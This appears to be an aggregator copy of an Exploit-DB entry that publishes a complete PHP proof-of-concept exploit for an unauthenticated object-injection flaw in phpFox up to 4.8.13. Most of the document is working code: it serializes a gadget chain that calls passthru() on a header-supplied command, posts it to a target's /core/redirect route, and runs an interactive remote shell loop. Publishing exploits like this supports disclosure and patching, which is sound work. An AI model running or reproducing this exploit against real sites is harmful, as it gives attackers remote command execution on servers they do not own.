7
[webapps] phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit
source link: https://www.exploit-db.com/exploits/51799
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit
<?php
/*
--------------------------------------------------------------
phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability
--------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.phpfox.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
User input passed through the "url" request parameter to the /core/redirect route is
not properly sanitized before being used in a call to the unserialize() PHP function.
This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP
objects into the application scope, allowing them to perform a variety of attacks,
such as executing arbitrary PHP code.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2023-12
*/
set_time_limit(0);
error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[+] cURL extension required!\n");
print "+------------------------------------------------------------------+\n";
print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
print "+------------------------------------------------------------------+\n";
if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
function encode($string)
{
$string = addslashes(gzcompress($string, 9));
return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
}
class Phpfox_Request
{
private $_sName = "EgiX";
private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";
}
class Core_Objectify
{
private $__toString;
function __construct($callback)
{
$this->__toString = $callback;
}
}
print "\n[+] Launching shell on {$argv[1]}\n";
$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));
while(1)
{
print "\nphpFox-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
}
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK